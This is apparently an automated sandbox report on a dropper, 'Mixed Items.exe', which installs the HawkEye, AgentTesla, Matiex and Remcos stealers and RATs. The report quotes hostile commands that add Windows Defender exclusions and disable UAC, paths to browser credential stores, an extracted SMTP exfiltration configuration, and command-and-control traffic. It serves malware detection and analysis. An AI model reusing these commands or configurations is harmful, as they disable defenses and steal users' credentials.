Loading ...

Play interactive tourEdit tour

Analysis Report Mixed Items.exe

Overview

General Information

Sample Name:Mixed Items.exe
Analysis ID:363869
MD5:017e52146c9131dbc9487d834cdfc247
SHA1:6dff831a7fd2a42ec3abe4c1ba51f3a9c9c6a25b
SHA256:26c230cde9fb7544f7e3762f1abac39f6c8f0d2db0689178b223e0e68d2a6a0a
Tags:exeRATRemcosRAT
Infos:

Most interesting Screenshot:

Detection

HawkEye AgentTesla MailPassView Matiex Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected HawkEye Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AgentTesla
Yara detected HawkEye Keylogger
Yara detected MailPassView
Yara detected Matiex Keylogger
Yara detected Remcos RAT
Adds a directory exclusion to Windows Defender
Binary contains a suspicious time stamp
Changes security center settings (notifications, updates, antivirus, firewall)
Changes the view of files in windows explorer (hidden files and folders)
Creates an autostart registry key pointing to binary in C:\Windows
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Installs a global keyboard hook
Machine Learning detection for dropped file
May check the online IP address of the machine
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Suspicious Svchost Process
Sigma detected: System File Execution Location Anomaly
Tries to harvest and steal browser information (history, passwords, etc)
Uses dynamic DNS services
Yara detected Beds Obfuscator
Yara detected WebBrowserPassView password recovery tool
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Startup

  • System is w10x64
  • Mixed Items.exe (PID: 6248 cmdline: 'C:\Users\user\Desktop\Mixed Items.exe' MD5: 017E52146C9131DBC9487D834CDFC247)
    • AdvancedRun.exe (PID: 7032 cmdline: 'C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 7152 cmdline: 'C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe' /SpecialRun 4101d8 7032 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 2152 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Mixed Items.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6300 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Mixed Items.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4116 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Mixed Items.exe (PID: 7140 cmdline: C:\Users\user\Desktop\Mixed Items.exe MD5: 017E52146C9131DBC9487D834CDFC247)
    • Mixed Items.exe (PID: 6440 cmdline: C:\Users\user\Desktop\Mixed Items.exe MD5: 017E52146C9131DBC9487D834CDFC247)
    • Mixed Items.exe (PID: 1528 cmdline: C:\Users\user\Desktop\Mixed Items.exe MD5: 017E52146C9131DBC9487D834CDFC247)
      • hawkgoods.exe (PID: 1392 cmdline: 'C:\Users\user\AppData\Local\Temp\hawkgoods.exe' 0 MD5: FFDB58533D5D1362E896E96FB6F02A95)
      • Matiexgoods.exe (PID: 6780 cmdline: 'C:\Users\user\AppData\Local\Temp\Matiexgoods.exe' 0 MD5: 80C61B903400B534858D047DD0919F0E)
      • origigoods20.exe (PID: 6064 cmdline: 'C:\Users\user\AppData\Local\Temp\origigoods20.exe' 0 MD5: 61DC57C6575E1F3F2AE14C1B332AD2FB)
      • origigoods40.exe (PID: 5292 cmdline: 'C:\Users\user\AppData\Local\Temp\origigoods40.exe' 0 MD5: AE36F0D16230B9F41FFECBD3C5B1D660)
      • Purchase Order.exe (PID: 5352 cmdline: 'C:\Users\user\AppData\Local\Temp\Purchase Order.exe' 0 MD5: 4983412EC34657BAB4A9BD56617B9960)
  • svchost.exe (PID: 6664 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6908 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 204 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6460 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6636 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6800 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5720 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7116 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 592 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • explorer.exe (PID: 6488 cmdline: 'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe' MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • explorer.exe (PID: 5508 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • svchost.exe (PID: 5536 cmdline: 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe' MD5: 017E52146C9131DBC9487D834CDFC247)
  • svchost.exe (PID: 5540 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • explorer.exe (PID: 5708 cmdline: 'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe' MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • explorer.exe (PID: 5276 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • svchost.exe (PID: 7024 cmdline: 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe' MD5: 017E52146C9131DBC9487D834CDFC247)
  • svchost.exe (PID: 5880 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: HawkEye

{"Modules": ["WebBrowserPassView", "mailpv", "Mail PassView"], "Version": ""}

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "sales1@midombo.comMARYolanmauluogwo@eversmtp.privateemail.com"}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\Purchase Order.exeJoeSecurity_RemcosYara detected Remcos RATJoe Security
    C:\Users\user\AppData\Local\Temp\Purchase Order.exeREMCOS_RAT_variantsunknownunknown
    • 0x5eae4:$str_a1: C:\Windows\System32\cmd.exe
    • 0x5ea60:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x5ea60:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x5e088:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
    • 0x5e6e0:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
    • 0x5dc2c:$str_b2: Executing file:
    • 0x5ec28:$str_b3: GetDirectListeningPort
    • 0x5e4a0:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
    • 0x5e824:$str_b5: licence_code.txt
    • 0x5e6c8:$str_b7: \update.vbs
    • 0x5dc9c:$str_b9: Downloaded file:
    • 0x5dc68:$str_b10: Downloading file:
    • 0x5dc50:$str_b12: Failed to upload file:
    • 0x5ebf0:$str_b13: StartForward
    • 0x5ec10:$str_b14: StopForward
    • 0x5e670:$str_b15: fso.DeleteFile "
    • 0x5e604:$str_b16: On Error Resume Next
    • 0x5e6a0:$str_b17: fso.DeleteFolder "
    • 0x5dc40:$str_b18: Uploaded file:
    • 0x5dcdc:$str_b19: Unable to delete:
    • 0x5e638:$str_b20: while fso.FileExists("
    C:\Users\user\AppData\Local\Temp\origigoods20.exeJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      C:\Users\user\AppData\Local\Temp\origigoods40.exeJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        C:\Users\user\AppData\Local\Temp\Matiexgoods.exeJoeSecurity_MatiexYara detected Matiex KeyloggerJoe Security
          Click to see the 7 entries

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000019.00000003.321855545.0000000004361000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000024.00000002.510313698.0000000002771000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              00000024.00000002.510313698.0000000002771000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                00000019.00000003.328468981.00000000043CD000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  00000025.00000002.488787782.0000000000982000.00000002.00020000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
                    Click to see the 36 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    30.2.hawkgoods.exe.2be8a9c.4.raw.unpackHKTL_NET_GUID_StealerDetects c# red/black-team tools via typelibguidArnim Rupp
                    • 0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
                    30.0.hawkgoods.exe.51fa72.3.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
                      30.2.hawkgoods.exe.300a1c4.5.raw.unpackHKTL_NET_GUID_StealerDetects c# red/black-team tools via typelibguidArnim Rupp
                      • 0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
                      30.0.hawkgoods.exe.4c9c0d.1.unpackJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
                        30.2.hawkgoods.exe.51fa72.2.raw.unpackRAT_HawkEyeDetects HawkEye RATKevin Breen <kevin@techanarchy.net>
                        • 0x1dc55:$key: HawkEyeKeylogger
                        • 0x1fe99:$salt: 099u787978786
                        • 0x1e296:$string1: HawkEye_Keylogger
                        • 0x1f0e9:$string1: HawkEye_Keylogger
                        • 0x1fdf9:$string1: HawkEye_Keylogger
                        • 0x1e67f:$string2: holdermail.txt
                        • 0x1e69f:$string2: holdermail.txt
                        • 0x1e5c1:$string3: wallet.dat
                        • 0x1e5d9:$string3: wallet.dat
                        • 0x1e5ef:$string3: wallet.dat
                        • 0x1f9bd:$string4: Keylog Records
                        • 0x1fcd5:$string4: Keylog Records
                        • 0x1fef1:$string5: do not script -->
                        • 0x1dc3d:$string6: \pidloc.txt
                        • 0x1dccb:$string7: BSPLIT
                        • 0x1dcdb:$string7: BSPLIT
                        Click to see the 107 entries

                        Sigma Overview

                        System Summary:

                        barindex
                        Sigma detected: Suspicious Svchost ProcessShow sources
                        Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe' , CommandLine: 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 5508, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe' , ProcessId: 5536
                        Sigma detected: System File Execution Location AnomalyShow sources
                        Source: Process startedAuthor: Florian Roth, Patrick Bareiss: Data: Command: 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe' , CommandLine: 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 5508, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe' , ProcessId: 5536
                        Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
                        Source: Process startedAuthor: vburov: Data: Command: 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe' , CommandLine: 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 5508, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe' , ProcessId: 5536

                        Signature Overview

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection:

                        barindex
                        Antivirus detection for dropped fileShow sources
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeAvira: detection malicious, Label: TR/Spy.Gen8
                        Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeAvira: detection malicious, Label: TR/Spy.Gen8
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeAvira: detection malicious, Label: TR/Redcap.jajcu
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeAvira: detection malicious, Label: TR/AD.MExecute.lzrac
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeAvira: detection malicious, Label: SPR/Tool.MailPassView.473
                        Found malware configurationShow sources
                        Source: 33.2.origigoods20.exe.e50000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "sales1@midombo.comMARYolanmauluogwo@eversmtp.privateemail.com"}
                        Source: hawkgoods.exe.1392.30.memstrMalware Configuration Extractor: HawkEye {"Modules": ["WebBrowserPassView", "mailpv", "Mail PassView"], "Version": ""}
                        Multi AV Scanner detection for dropped fileShow sources
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeMetadefender: Detection: 51%Perma Link
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeReversingLabs: Detection: 89%
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeReversingLabs: Detection: 95%
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeMetadefender: Detection: 40%Perma Link
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeReversingLabs: Detection: 92%
                        Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeMetadefender: Detection: 37%Perma Link
                        Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeReversingLabs: Detection: 85%
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeReversingLabs: Detection: 21%
                        Multi AV Scanner detection for submitted fileShow sources
                        Source: Mixed Items.exeReversingLabs: Detection: 17%
                        Yara detected Remcos RATShow sources
                        Source: Yara matchFile source: 00000025.00000002.488787782.0000000000982000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000025.00000002.490909756.0000000000A7A000.00000004.00000020.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Purchase Order.exe, type: DROPPED
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.4095c7.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.40afcc.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.4031bf.3.raw.unpack, type: UNPACKEDPE
                        Machine Learning detection for dropped fileShow sources
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\Purchase Order.exeJoe Sandbox ML: detected
                        Source: 25.2.Mixed Items.exe.4031bf.3.unpackAvira: Label: TR/Inject.vcoldi
                        Source: 30.2.hawkgoods.exe.4c0000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                        Source: 30.2.hawkgoods.exe.4c0000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                        Source: 31.0.Matiexgoods.exe.4d0000.0.unpackAvira: Label: TR/Redcap.jajcu
                        Source: 30.0.hawkgoods.exe.4c0000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                        Source: 30.0.hawkgoods.exe.4c0000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                        Source: 31.2.Matiexgoods.exe.4d0000.0.unpackAvira: Label: TR/Redcap.jajcu
                        Source: 25.2.Mixed Items.exe.400000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                        Source: 25.2.Mixed Items.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                        Source: 25.2.Mixed Items.exe.400000.0.unpackAvira: Label: TR/Redcap.jajcu
                        Source: 25.2.Mixed Items.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen

                        Compliance:

                        barindex
                        Uses insecure TLS / SSL version for HTTPS connectionShow sources
                        Source: unknownHTTPS traffic detected: 172.67.188.154:443 -> 192.168.2.3:49747 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 172.67.188.154:443 -> 192.168.2.3:49760 version: TLS 1.0
                        Uses new MSVCR DllsShow sources
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
                        Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
                        Source: Mixed Items.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Binary contains paths to debug symbolsShow sources
                        Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: AdvancedRun.exe, 00000007.00000002.268206463.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000009.00000000.266715806.000000000040C000.00000002.00020000.sdmp
                        Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: hawkgoods.exe
                        Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: hawkgoods.exe
                        Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: hawkgoods.exe
                        Source: hawkgoods.exeBinary or memory string: autorun.inf
                        Source: hawkgoods.exeBinary or memory string: [autorun]
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 4x nop then jmp 04D01A73h
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 4x nop then jmp 04D01A73h
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 4x nop then jmp 04D01A73h
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 4x nop then call 04D01B20h
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]

                        Networking:

                        barindex
                        May check the online IP address of the machineShow sources
                        Source: unknownDNS query: name: checkip.dyndns.org
                        Source: unknownDNS query: name: checkip.dyndns.org
                        Source: unknownDNS query: name: checkip.dyndns.org
                        Source: unknownDNS query: name: checkip.dyndns.org
                        Source: unknownDNS query: name: whatismyipaddress.com
                        Source: unknownDNS query: name: whatismyipaddress.com
                        Source: unknownDNS query: name: whatismyipaddress.com
                        Source: unknownDNS query: name: whatismyipaddress.com
                        Source: unknownDNS query: name: whatismyipaddress.com
                        Source: unknownDNS query: name: whatismyipaddress.com
                        Source: unknownDNS query: name: whatismyipaddress.com
                        Source: unknownDNS query: name: whatismyipaddress.com
                        Source: unknownDNS query: name: whatismyipaddress.com
                        Source: unknownDNS query: name: whatismyipaddress.com
                        Source: unknownDNS query: name: checkip.dyndns.org
                        Source: unknownDNS query: name: checkip.dyndns.org
                        Source: unknownDNS query: name: checkip.dyndns.org
                        Source: unknownDNS query: name: checkip.dyndns.org
                        Uses dynamic DNS servicesShow sources
                        Source: unknownDNS query: name: feromo.duckdns.org
                        Source: global trafficTCP traffic: 192.168.2.3:49731 -> 185.157.161.113:8078
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                        Source: Joe Sandbox ViewIP Address: 104.16.155.36 104.16.155.36
                        Source: Joe Sandbox ViewASN Name: OBE-EUROPEObenetworkEuropeSE OBE-EUROPEObenetworkEuropeSE
                        Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                        Source: unknownHTTPS traffic detected: 172.67.188.154:443 -> 192.168.2.3:49747 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 172.67.188.154:443 -> 192.168.2.3:49760 version: TLS 1.0
                        Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-EBDA9D3C78F7FA5DA1492447CFEEA8B3.html HTTP/1.1User-Agent: OtherHost: liverpoolofcfanclub.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-ACE03D270F49949C304CBC49EDC5CEFA.html HTTP/1.1User-Agent: OtherHost: liverpoolofcfanclub.com
                        Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5120AB9D8EED6517DE7E81CD470A03B1.html HTTP/1.1User-Agent: OtherHost: liverpoolofcfanclub.com
                        Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-FC805D8F9D665A8AE96BD3B687F20834.html HTTP/1.1User-Agent: OtherHost: liverpoolofcfanclub.com
                        Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-CADB725393BA475AD7E7466656748C83.html HTTP/1.1User-Agent: OtherHost: liverpoolofcfanclub.com
                        Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-1031025574F544F1BD64E20EEEC4AAC7.html HTTP/1.1User-Agent: OtherHost: liverpoolofcfanclub.com
                        Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5C391B584FB3EF0C3E1226CABE1FDCB1.html HTTP/1.1User-Agent: OtherHost: liverpoolofcfanclub.com
